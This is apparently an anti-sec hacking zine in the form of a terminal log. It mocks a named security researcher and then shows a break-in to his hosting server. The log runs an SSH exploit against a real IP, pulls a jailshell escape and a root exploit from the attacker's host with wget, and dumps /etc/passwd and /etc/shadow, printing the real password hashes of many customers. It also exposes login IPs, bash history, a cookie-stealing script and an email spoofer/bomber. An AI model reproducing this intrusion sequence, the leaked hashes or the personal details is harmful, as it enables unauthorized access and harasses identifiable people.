__ .__ _____ ____ _/ |_ |__| ______ ____ ____ \__ \ / \\ __\| | ______ / ___/_/ __ \_/ ___\ / __ \_| | \| | | | /_____/ \___ \ \ ___/\ \___ (____ /|___| /|__| |__| /____ > \___ >\___ > \/ \/ \/ \/ \/group. anti-sec:~# cd expose/ anti-sec:~/expose# cat glafkos.info Glafkos Charalambous AKA nowayout / nowayin, You may know him from his contributions to the security scene: - http://www.milw0rm.com/papers/186 ~ Securing and Hardening Linux v1.0 - http://www.milw0rm.com/papers/286 ~ Bypassing Windows Server 2008 Password Protection - http://www.milw0rm.com/exploits/7216 ~ WebStuido CMS Blind SQL Injection - http://www.milw0rm.com/exploits/7722 ~ DZcms Remote SQL Injection ... and a couple of thousand *lethal* XSS exploits... He was also part of Astalavista ( RIP ) staff. Looks like everyone involved in that cult is a security expert. Websites owned and managed by nowayout: - http://www.infosec.org.uk ~ Information Security Uncensored / Exploits / MD5 Cracker / Default Ports / Tools / Security News / Videos / Papers - http://www.itsolutionskb.com ~ IT Solutions Knowledge Base - http://www.md6.me ~ MD6 Hash Calculator - http://www.defaultports.com ~ Default DB Ports, Computer Ports, TCP/UDP Ports, Services, Protocols - http://www.scanpc.org ~ Your FREE Online Port Scanne - http://www.webhostline.com ~ His little hosting company Quotes from his CV: - B.Sc. in Computer Science; System Analysis & Design, Digital Logic, Database Management, Assembly, Local & Metropolitan Area Networks, Data Communications & Computer Networks, Operating Systems, Software Engineering, Advanced Programming in UNIX Environment, Computer Graphics, Object Oriented Programming, Compiler Writing, Machine Learning, Artificial Intelligence, Parallel Processing, Internet Technologies, Multimedia Programming (Java), Image & Signal Processing, Algorithms & Complexity, Programming Languages, Object Oriented Database Management, Visual Programming, Advance Numerical Methods, Computer Aided Design, Logic Programming, Data Structures, Mathematics - Work: Managed IT Services Coordinator Setup and Configuration of Business Application Solutions Users Training Users Support Systems Security, Maintenance, Monitoring, Reporting Security Consulting Hosting Management Server(s) maintenance/management (AD, Group Policies, ISA, MSSQL, IIS, Exchange, Remote Access, VPN) Network maintenance/management (Switch, Routers, Wireless) Internet, Intranet, Backups, Antivirus & WSUS maintenance/management Website Design & Backend support Helpdesk support & monitoring Installation & Maintenance of client computers IT Department Policies Software Development Penetration Testing/System Security - Computer Skills ( We believe he posses _none_ ): Vulnerability testing, network security auditing as well as extensive experience in hardening/securing GNU/Linux & Windows public facing servers including web, ftp & email servers Programming languages: Assembly, C/C++, Java, Visual Basic 6/.NET, C# .NET, Perl, Python Web Programming/Scripting languages: JSP, Servlets, ASP, PHP, Perl, XHTML, AJAX, JavaScript Relational Database Management Systems (RDBMS MySQL/MSSQL) and database design Expert user/administrator of Microsoft DOS, Windows 95/98/NT/2000/XP/Vista/2003/2008 as well as their server equivalent incarnations and various *BSD, GNU/Linux operating systems (FreeBSD, OpenBSD, Slackware, SUSE, CentOS, Mandrake, Red Hat, Ubuntu, BackTrack) Extensive, hands-on, experience with various graphic related computer packages (Photoshop, Fireworks etc.) Extensive experience with various web design related computer packages (Dreamweaver, Flash etc.) Extensive experience with MS-Office (Word, Excel, Access, PowerPoint, Outlook) Extensive experience in administrating/securing GNU/Linux & Windows public facing servers A decade of experience in troubleshooting, technical, hardware and network related, problems - Certifications ( What kind of an idiot passes a certificate of any kind to this moron? ): Cisco Certified Network Associate - (CCNA) Certified Ethical Hacker - (CEH) Computer Hacking Forensic Investigator - (CHFI) Network Security Administrator - (NSA) Certified Security Analyst - (ECSA) Licensed Penetration Tester - (LPT) Microsoft Certified IT Professional - (MCITP) Microsoft Certified Technology Specialist - (MCTS) - Interests: I enjoy taking on challenges on Penetration Testing, Network Security, Programming, Logic, Reverse Engineering, Steganography and Cryptology on various security related websites (ref: hackits.de handle: nowayout) I enjoy reading programming and security related books and I have a sizeable library of relevant books and references. Astalavista.com/.net - The hacking & security community - Administrator (One of the biggest security related site worldwide) ( *We beg to differ* *wink* ) BlackHat-Forums.com - Administrator in a well known forum for security professionals to share and discuss security related information Writing advisories and exploits for system and web vulnerabilities - Publications: Reverse Engineering: Anti-Cracking Techniques Paper Reverse Engineering: Smashing The Signature Paper Securing & Hardening Linux v1.0 Paper 802.11 WPA-PSK Crack Video Tutorial 802.11 Packet Injection in Windows Video Tutorial Holy crap! With that kind of CV, you would expect the person to *actually* know his way around computers, securing systems, having flawless code, etc. After we saw him poking around the Astalavista Exposure trying to find out who was behind it, we decided to take a look at his box(es). After all, we're not supposed to find anything... ...right? EOF. anti-sec:~/expose# cd ~/pwn/ anti-sec:~/pwn# ./infoz infosec.org.uk IP: 66.96.220.213 NS: - ns1.webhostline.com - ns2.webhostline.com Mail Server: - 66.96.220.213 > 6696220213.hostnoc.net WWW Server: Apache SSH Banner: SSH-2.0-OpenSSH_4.3 : PORT 2222 anti-sec:~/pwn# cd xpl/ anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt [+] openPWN - anti-sec group [+] Target: 66.96.220.213 [+] SSH Port: 2222 [+] List: users.txt [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] user: crownvip uname: Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux sh-3.1$ export HISTFILE=/dev/null sh-3.1$ w 11:23:39 up 306 days, 1:02, 1 user, load average: 0.77, 0.62, 0.64 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT sh-3.1$ who infosec pts/2 2009-06-05 06:41 (91.184.220.239) // We got in, while he is -on- the server... is he going to catch us ( considering his amazing CV )? lets wait and see... sh-3.1$ env MANPATH=/usr/lib/courier-imap/man: HOSTNAME=srv01.webhostline.com SHELL=/usr/local/cpanel/bin/jailshell TERM=xterm HISTSIZE=1000 SSH_CLIENT=13.33.33.37 35154 2222 SSH_TTY=/dev/pts/1 USER=crownvip MAIL=/var/spool/mail/infosec PWD=/home/crownvip INPUTRC=/etc/inputrc JAVA_HOME=/usr/local/jdk EDITOR=pico LANG=en_US.UTF-8 HOME=/home/crownvip SHLVL=4 LS_OPTIONS=--color=tty -F -a -b -T 0 LOGNAME=crownvip CVS_RSH=ssh VISUAL=pico SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222 CLASSPATH=.:/usr/local/jdk/lib/classes.zip LESSOPEN=|/usr/bin/lesspipe.sh %s HISTFILE=/dev/null G_BROKEN_FILENAMES=1 _=/usr/bin/env // Awww, jailshell... sh-3.1$ wget http://anti.sec.labs/MichaelScofield --13:33:37-- http://anti.sec.labs/MichaelScofield Resolving anti.sec.labs... 13.33.33.37 Connecting to anti.sec.labs|13.33.33.37|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4921 (4.8K) [text/plain] Saving to: `MichaelScofield' 100%[=========================================================================================================================================>] 4,921 --.-K/s in 0.08s 11:27:57 (64.0 KB/s) - `MichaelScofield' saved [4921/4921] sh-3.1$ chmod +x MichaelScofield sh-3.1$ ./MichaelScofield [+] MichaelScofield - Prison Breaker / anti-sec group [+] Grabbing environment variables... SHELL=/usr/local/cpanel/bin/jailshell [+] Injecting new shell.. [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] SHELL=/bin/sh sh-3.1$ env MANPATH=/usr/lib/courier-imap/man: HOSTNAME=srv01.webhostline.com SHELL=/bin/sh TERM=xterm HISTSIZE=1000 SSH_CLIENT=13.33.33.37 35154 2222 SSH_TTY=/dev/pts/1 USER=crownvip MAIL=/var/spool/mail/infosec PWD=/home/crownvip INPUTRC=/etc/inputrc JAVA_HOME=/usr/local/jdk EDITOR=pico LANG=en_US.UTF-8 HOME=/home/crownvip SHLVL=4 LS_OPTIONS=--color=tty -F -a -b -T 0 LOGNAME=crownvip CVS_RSH=ssh VISUAL=pico SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222 CLASSPATH=.:/usr/local/jdk/lib/classes.zip LESSOPEN=|/usr/bin/lesspipe.sh %s HISTFILE=/dev/null G_BROKEN_FILENAMES=1 _=/usr/bin/env // Prison Break FTW. sh-3.1$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin cpanel:x:32001:32001::/usr/local/cpanel:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell x00mario:x:32007:32009::/home/x00mario:/usr/local/cpanel/bin/jailshell defaultp:x:32008:32010::/home/defaultp:/usr/local/cpanel/bin/jailshell astalavi:x:32009:32011::/home/astalavi:/usr/local/cpanel/bin/noshell whitelig:x:32010:32012::/home/whitelig:/usr/local/cpanel/bin/jailshell divecom:x:32011:32013::/home/divecom:/usr/local/cpanel/bin/noshell glafkos:x:32012:32014::/home/glafkos:/usr/local/cpanel/bin/noshell infosec2:x:32013:32015::/home/infosec2:/usr/local/cpanel/bin/jailshell whitegr:x:32014:32016::/home/whitegr:/usr/local/cpanel/bin/jailshell glafcom:x:32015:32017::/home/glafcom:/usr/local/cpanel/bin/jailshell webhostl:x:32016:32018::/home/webhostl:/usr/local/cpanel/bin/jailshell infosec:x:32017:32019::/home/infosec:/bin/bash ryb:x:32018:32020::/home/ryb:/usr/local/cpanel/bin/jailshell ariadmin:x:32019:32021::/home/ariadmin:/usr/local/cpanel/bin/noshell indianos:x:32020:32022::/home/indianos:/usr/local/cpanel/bin/noshell nowayin:x:32021:32023::/home/nowayin:/usr/local/cpanel/bin/noshell forextrd:x:32022:32024::/home/forextrd:/usr/local/cpanel/bin/jailshell itteam:x:32023:32025::/home/itteam:/bin/bash itkb:x:32024:32026::/home/itkb:/bin/bash infosecs:x:32025:32027::/home/infosecs:/usr/local/cpanel/bin/noshell toxworx:x:32026:32028::/home/toxworx:/usr/local/cpanel/bin/noshell scanpc:x:32027:32029::/home/scanpc:/bin/bash mako:x:32028:32030::/home/mako:/bin/bash bufferov:x:32029:32031::/home/bufferov:/bin/bash exploitm:x:32030:32032::/home/exploitm:/usr/local/cpanel/bin/jailshell md5org:x:32031:32033::/home/md5org:/bin/bash webtech:x:501:501::/home/webtech:/usr/local/cpanel/bin/jailshell mariosto:x:502:502::/home/mariosto:/usr/local/cpanel/bin/noshell md6me:x:510:510::/home/md6me:/bin/bash royallim:x:511:511::/home/royallim:/usr/local/cpanel/bin/noshell crownvip:x:513:513::/home/crownvip:/usr/local/cpanel/bin/jailshell dnsmafia:x:514:514::/home/dnsmafia:/bin/bash sh-3.1$ uname -a Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux sh-3.1$ wget http://anti.sec.labs/r00tr00t --13:33:37-- http://anti.sec.labs/r00tr00t Resolving anti.sec.labs... 13.33.33.37 Connecting to anti.sec.labs|13.33.33.37|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 207614 (203K) [text/plain] Saving to: `r00tr00t' 100%[=========================================================================================================================================>] 207,614 445K/s in 0.5s 14:33:02 (445 KB/s) - `r00tr00t' saved [207614/207614] sh-3.1$ chmod +x r00tr00t sh-3.1$ ./r00tr00t [+] r00tr00t - anti-sec group [+] "Root is a state of mind" r0000000000000000000000000000t state achieved. sh-3.1# cat /etc/shadow root:$1$xm86ZzkL$bQdr6VN7uOw1Ar7vlFD1B/:14085:0:99999:7::: [snip] x00mario:$1$9XAEe8Rf$J3XgPozk2i7iuI5eUIpjt.:14168:0:99999:7::: defaultp:$1$d6jvruJw$8uJrpBNHCI2q.2z7on.ql/:14272:0:99999:7::: astalavi:$1$yUNU3lEZ$vKz7vTcAvp4jMi6VU1x/B1:14085:0:99999:7::: whitelig:$1$uJJARut7$gjdZTs/phGRWW57tgoqLG.:14085:0:99999:7::: divecom:$1$wmhcRfR7$9fqUHAk9AcKdSfjrxYiUZ/:14085:0:99999:7::: glafkos:$1$hm0QE06x$sXXNM12w0UYw.PtA7Tyho.:14085:0:99999:7::: infosec2:$1$ySWf10d8$ZFQVBABuoYrqvClq9/Hlp/:14085:0:99999:7::: whitegr:$1$kWQJ8jA2$DcaUTvfmle9KkzM7JOcFr.:14085:0:99999:7::: glafcom:$1$zQsYWYtk$P0ey4cYCasgnAI56tqxGd.:14085:0:99999:7::: webhostl:$1$RMkUH7oE$2N5BIbDBKKLIjHNamWjWo.:14365:0:99999:7::: infosec:$1$XPuGjU6/$heLW/bq6CwLVaQYmKhusQ0:14085:0:99999:7::: ryb:$1$fRYpFuUS$S.EvITiqZGNyMC4GeOPrF.:14086:0:99999:7::: ariadmin:$1$YDqKvJNU$MC0OpYHqqVIctgnndwsUC0:14087:0:99999:7::: indianos:$1$a9qbBXl1$Js66FA5mcwwXGeOnqJcfz/:14121:0:99999:7::: nowayin:$1$yk7__joq$nu37bgAkc0w5goAxb8n9D1:14141:0:99999:7::: forextrd:$1$ZWrANLSA$yNM3vX1BNpY.N01QuLQs8/:14150:0:99999:7::: itteam:$1$LHskTuym$DwTjniwuOeWOBgrlR69V7/:14176:0:99999:7::: itkb:$1$iC4hvUS7$Q2xbPLGeQ3mQ23Ms8Or/d/:14272:0:99999:7::: infosecs:$1$DbsRaxJY$9/FPxis9LlDvC8g68uQX/.:14176:0:99999:7::: toxworx:$1$RLXK1IOI$oVD.9vW23LZvqO2qGOcTS0:14185:0:99999:7::: scanpc:$1$OrBmwxcY$x99Dfuz/aXgQwlo2GnLBu.:14189:0:99999:7::: mako:$1$.OiJ8FGc$UDAHAv6qImKoBwnoZxOwz1:14213:0:99999:7::: bufferov:$1$5SgPTS1q$EqYsfnpq84VfPEzYRgf2P0:14214:0:99999:7::: exploitm:$1$sdfoKEGa$WNIv/KC2/LwB3pyu6AECD.:14214:0:99999:7::: md5org:$1$RxzDlNEl$isPFAmLWyuZgr9OJ7a/7R1:14247:0:99999:7::: webtech:$1$n35djEg8$cNPz.nG6tRDok4mdUHSwW/:14365:0:99999:7::: mariosto:$1$hEz88KSv$9T7WKLEp6hKfKUXACP/Qm/:14270:0:99999:7::: md6me:$1$h660cR_M$nldIHgTpP8L0jgFrPOvHw.:14338:0:99999:7::: royallim:$1$YaiR6rGi$neRBspL0cFhT1rMYyKl6J0:14347:0:99999:7::: crownvip:$1$M07FZatl$TuX/UR7CZmK3HVptnKcne1:14403:0:99999:7::: dnsmafia:$1$656LevHM$oPnT4n7jXeipQO3G4NMfH.:14371:0:99999:7::: sh-3.1# lastlog | grep -v Never Username Port From Latest defaultp pts/6 91.184.220.239 Wed May 6 02:46:02 -0400 2009 glafcom pts/0 213.207.156.52 Tue Sep 30 02:28:48 -0400 2008 webhostl pts/1 91.184.220.239 Sun May 24 05:09:36 -0400 2009 infosec pts/2 91.184.220.239 Fri Jun 5 06:41:51 -0400 2009 itkb pts/3 91.184.220.239 Mon Jun 8 11:41:16 -0400 2009 scanpc pts/4 91.184.220.239 Wed May 6 02:35:33 -0400 2009 mako pts/1 67.225.142.98 Thu May 21 06:14:56 -0400 2009 md5org pts/2 91.184.220.239 Sat Jan 3 14:27:24 -0500 2009 webtech pts/0 79.101.197.121 Fri Feb 20 10:58:09 -0500 2009 md6me pts/2 91.184.220.239 Mon Jun 1 14:14:18 -0400 2009 royallim pts/3 91.184.220.239 Mon May 11 04:20:45 -0400 2009 crownvip pts/4 91.184.220.239 Mon Jun 8 12:14:08 -0400 2009 // Lets see what Mr Glafkos got on his server... sh-3.1# cd ~infosec sh-3.1# ls -la total 368 drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 . drwxr-xr-x 43 root root 4096 Jun 8 00:20 .. lrwxrwxrwx 1 infosec infosec 33 Jul 25 2008 access-logs -> /usr/local/apache/domlogs/infosec -rw-r--r-- 1 infosec infosec 24 Feb 23 2007 .aspell.en.prepl -rw-r--r-- 1 infosec infosec 21 Feb 23 2007 .aspell.en.pws -rw------- 1 infosec infosec 15255 Jun 5 07:04 .bash_history -rw-r--r-- 1 infosec infosec 24 Jan 26 2007 .bash_logout -rw-r--r-- 1 infosec infosec 191 Jan 26 2007 .bash_profile -rw-r--r-- 1 infosec infosec 124 Jan 26 2007 .bashrc drwx------ 23 infosec infosec 4096 May 9 12:23 bck -rw------- 1 infosec infosec 22 May 17 06:19 .contactemail drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 .cpaddons -rw-r--r-- 1 infosec infosec 0 Feb 9 2007 .cpaddons_notify drwxr-xr-x 5 infosec infosec 4096 Jan 8 17:18 .cpanel -rw-r----- 1 infosec infosec 1 Jan 15 00:05 cpbackup-exclude.conf drwxr-xr-x 3 infosec infosec 4096 Jul 25 2008 cpmove.psql -rw-r--r-- 1 infosec infosec 14 Jun 8 14:03 .dns -rw-r--r-- 1 infosec infosec 7661 Jan 19 04:21 domain.txt drwx------ 2 infosec infosec 4096 Mar 11 2007 .elinks -rw-r--r-- 1 infosec infosec 383 Jan 26 2007 .emacs -rw-r--r-- 1 root root 416 Jul 29 2008 error_log drwxr-x--- 3 infosec mail 4096 Jun 9 2008 etc drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 .fantasticodata -rw------- 1 infosec infosec 16 May 26 00:04 .ftpquota drwx------ 2 infosec infosec 4096 Jun 9 2008 .gnupg -rw-r--r-- 1 infosec infosec 348 Oct 22 2007 .gpgtemp -rwxr-xr-x 1 infosec infosec 205 Mar 9 2008 host2port.sh -rw-r--r-- 1 infosec infosec 1315 Mar 20 2008 host.c -rw-r--r-- 1 infosec infosec 1393 Mar 5 2008 hostnames.c drwxr-x--- 2 infosec nobody 4096 Jul 25 2008 .htpasswds -rw-r--r-- 1 infosec infosec 2048 Mar 19 05:57 infosecbackup.php -rwxr-xr-x 1 infosec infosec 673 Nov 3 2008 infosecbackup.sh -rw-r--r-- 1 infosec infosec 7 Jul 25 2008 .lang -rw------- 1 infosec infosec 14 Jun 8 12:15 .lastlogin drwx------ 2 infosec infosec 4096 Aug 11 2007 logs drwxrwx--- 11 infosec infosec 4096 Jul 25 2008 mail -rw-r--r-- 1 infosec infosec 36 Jan 26 2007 .mailboxlist drwxr-xr-x 2 infosec infosec 4096 Nov 27 2008 md5proc -rw------- 1 infosec infosec 1 Jun 6 2007 mysql-db-count -rw------- 1 infosec infosec 404 Apr 15 2008 .mysql_history drwx------ 2 infosec infosec 4096 Feb 15 2007 .neomail drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-glafkos drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-ishtus drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-yiannos drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 perl -rw-r--r-- 1 infosec infosec 782 Oct 13 2007 popdel.py drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 psd drwxr-xr-x 3 infosec infosec 4096 Jul 25 2008 public_ftp drwxr-x--- 33 infosec nobody 4096 May 9 12:27 public_html -rw-r--r-- 1 infosec infosec 75671 Mar 28 2008 rfibot.pl drwx------ 2 infosec infosec 4096 Jun 8 14:01 .spamassassin -rw-r--r-- 1 infosec infosec 0 Nov 9 2007 .spamassassinboxenable -rw-r--r-- 1 infosec infosec 0 Nov 9 2007 .spamassassinenable drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 spike -rw-r--r-- 1 infosec infosec 41558 Nov 23 2007 spike_phpSecAudit_0.27.zip drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .sqlier drwx------ 2 infosec infosec 4096 Jun 9 2008 .sqmaildata drwx------ 4 infosec infosec 4096 Jun 9 2008 ssl -rw-r--r-- 1 infosec infosec 1803 Mar 8 2008 test.c drwxr-xr-x 7 infosec infosec 4096 Jun 8 12:16 tmp drwx------ 2 infosec infosec 4096 May 30 2007 .trash lrwxrwxrwx 1 infosec infosec 11 Jul 25 2008 www -> public_html -rw-r--r-- 1 infosec infosec 658 Jul 25 2008 .zshrc sh-3.1# cat .bash_history php remotesearch.php nano remotesearch.php [snip x 100000] lynx http://www.md5oogle.com/decrypt.php?input= ls php remotesearch.php nano remotesearch.php php remotesearch.php ps -x kill -9 30000 kill -9 30008 kill -9 30009 kill -9 30108 kill -9 30494 [snip] cat cracked.txt rm cracked.txt rm notfound.txt rm queue.txt mv queue2.txt queue.txt [snip] rm notfound.txt cat cracked.txt rm cracked.txt clear php remotesearch.php cat cracked.txt wc -l cracked.txt wc -l notfound.txt wc -l queue.txt cat notfound.txt nano notfound.txt wc -l queue.txt wc -l queue.txt wc -l notfound.txt wc -l cracked.txt df -h mem top ls [snip] cat cracked.txt cd www cd md5/ cd scripts/ wc -l cracked.txt nano readmd5hash.php php readmd5hash.php clear ls [snip] ls -la out.sql cat out.sql cd rc ls cd .. ls cd _php ls cd md5/ ls nano ajaxcalc.php pwd nano ajaxcalc.php [snip] cat cracked.txt wget http://milw0rm.com/mil-dic.php <-- milw0rm fanboy. php md5import.php mil-dic.txt cat queue.txt nano autocracker.php php autocracker.php wc -l queue.txt cat queue.txt ls [snip] nano md5.php nano md5.php nano md5.php $req = mysql_query("INSERT INTO $dbtabl (id, md5, plaintext) VALUES ('','$result', '$string')") or die($msger3); cd .. cd md5/ cd scripts/ wc -l crack wc -l cracked.txt cat cracked.txt [snip] rm notfound.txt ifconfig -a ping 10.0.7.198 su ls -la [snip] cat md5sorted.txt | cut -d";" -f 2 cat md5sorted.txt | cut -d";" -f 2 > md5plaintext.txt [snip] nano domains.html cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview">" cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview\">" cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview " wc -l domains.html cat domains.html | grep uibs.net cat domains.html | grep uibs.net | cut -d ">" cat domains.html | grep uibs.net | cut -d ">" -f 1 cat domains.html | grep uibs.net | cut -d ">" -f 2 cat domains.html | grep domainOverview | cut -d ">" -f 2 cat domains.html | grep =domainOverview | cut -d ">" -f 2 [snip] cd /dev/sda4 mount cd / dir ls -la rm 32-libata.tar.gz su su exit su info@sec.org.uk [snip] ls -la crontab -l su df -h su - root cd www ls su last lastlog [snip] ls wget http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz unzip dnsenum1.2.tar.gz tar -zxvf dnsenum1.2.tar.gz cd dnsenum1.2 ls ./dnsenum.pl ./dnsenum.pl ./dnsenum.pl ./dnsenum.pl ./dnsenum.pl charpilakoutas.com.cy ./dnsenum.pl charpilakoutas.com.cy -f dns.txt <-- Certified Ethical Hacker's best friend. ftp nowayout.no-ip.org su crontab -l ping taveli.com [snip] su nmap -v -P0 mail.sobohgroup.com <-- Network Security Administrator's best friend. nmap -v -P0 213.207.162.192 nmap -v -P0 mail.sobohgroup.com [snip] ftp nowayout.myftp.org cd www ls cd themes/ [snip] cat cpbackup-exclude.conf cd www ls d -sch du -sch ls rm -r *.rar ls du -h --max-depth=1 [snip] tar --help | grep bzip <-- He shows serious Linux skills, phear. tar --help | grep bz2 sh-3.1# cd bck sh-3.1# ls -la total 3800 drwx------ 23 infosec infosec 4096 May 9 12:23 . drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .. drwxr-xr-x 9 infosec infosec 4096 Jun 9 2008 administrator drwxr-xr-x 4 infosec infosec 4096 Jun 9 2008 ajaxmd5 drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 cache drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 ceh drwxr-xr-x 2 infosec infosec 4096 Feb 16 2007 cgi-bin -rw-r--r-- 1 infosec infosec 99938 Dec 24 2006 CHANGELOG.php drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 code drwxrwxrwx 29 infosec infosec 4096 Jun 9 2008 components -rw-rw-rw- 1 infosec infosec 2709 Aug 2 2007 configuration.php -rw-r--r-- 1 infosec infosec 4251 Dec 24 2006 configuration.php-dist -rwxrwxrwx 1 infosec infosec 294 Jun 2 2007 cookies.php -rwxrwxrwx 1 infosec infosec 198 Jun 2 2007 cookies.txt -rw-r--r-- 1 infosec infosec 3429 Dec 24 2006 COPYRIGHT.php drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 editor -rw-r--r-- 1 nobody nobody 535 Aug 2 2007 error_log drwxr-xr-x 7 infosec infosec 4096 Jun 9 2008 exam -rw-r--r-- 1 infosec infosec 3535 Feb 9 2007 globals.php -rw-r--r-- 1 infosec infosec 145 Mar 1 2007 hello.pl drwxr-xr-x 3 infosec infosec 16384 Jun 9 2008 help drwxrwxrwx 7 infosec infosec 4096 Jun 9 2008 images drwxr-xr-x 10 infosec infosec 4096 Jun 9 2008 includes -rw-r--r-- 1 infosec infosec 5223 Feb 9 2007 index2.php -rw-r--r-- 1 infosec infosec 8491 Feb 9 2007 index.php drwxr-xr-x 2 infosec infosec 4096 Apr 21 2007 infosecis drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 language -rw-r--r-- 1 infosec infosec 17977 Dec 24 2006 LICENSE.php -rw-r--r-- 1 infosec infosec 710 Dec 24 2006 mainbody.php drwxrwxrwx 8 infosec infosec 4096 Jun 9 2008 mambots drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 md5 drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 media drwxrwxrwx 15 infosec infosec 4096 Jun 9 2008 modules -rw-r--r-- 1 infosec infosec 3555493 May 27 2007 nvdcve-2007.xml -rw-r--r-- 1 infosec infosec 2474 Dec 24 2006 offlinebar.php -rw-r--r-- 1 infosec infosec 4929 Dec 24 2006 offline.php -rw-r--r-- 1 infosec infosec 709 Dec 24 2006 pathway.php -rw-r--r-- 1 infosec infosec 286 Dec 24 2006 robots.txt -rwxrwxrwx 1 infosec infosec 0 Jun 2 2007 steal.php drwxr-xr-x 5 infosec infosec 4096 Jun 9 2008 tabs drwxrwxrwx 10 infosec infosec 4096 Jun 9 2008 templates -rw-r--r-- 1 infosec infosec 9641 May 27 2007 vuln.php drwxrwxr-x 4 infosec infosec 4096 Jun 9 2008 xcms sh-3.1# cat configuration.php sh-3.1# cat cookies.php IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp); ?> // Ph34r the CEH, he logs your cookies. sh-3.1# cat hello.pl #!/usr/bin/perl use strict; use CGI ':standard'; print header; print start_html('Hello World'); print h1('Hello World'); print end_html(); exit; // Hai :] sh-3.1# head vuln.php #!/usr/bin/php -q rn"; $to=$_POST['to']; $from=$_POST['from']; $reply=$_POST['reply']; $headers="From: ".$from."rnReply-To: ".$reply; $subject=$_POST['subject']; $message=$_POST['textarea']; $num=$_POST['num']; $counter=range(1,$num); if(isset($to) && isset($from) && isset($message) && $num!=NULL){ foreach($counter as $counter) { if (mail($to, $subject, $message, $headers)){ echo "Mail sent!rn"; echo "

Mail nAasAA? ".$counter." succesfully sent!rn"; } else { echo "Mail not sentrn"; echo "Mail nAasAA? ".$counter."couldn't be sent, please try again.rn"; } } } elseif($num==NULL){ if (@mail($to, $subject, $message, $headers)){ echo "Mail sent!rn"; echo "

Mail succesfully sent!rn"; } else { echo "Mail not sentrn"; echo "Mail couldn't be sent, please try again.rn"; } } else{ echo "Please fill in all necessary fields."; } } //display mail form function mail_form() { echo << Email Spoofer/Bomber Email Spoofer/Bomber

receiver:
your email:
reply email:
subject:
send email times
text:

Warning: bombing an email takes a while, please be patient!

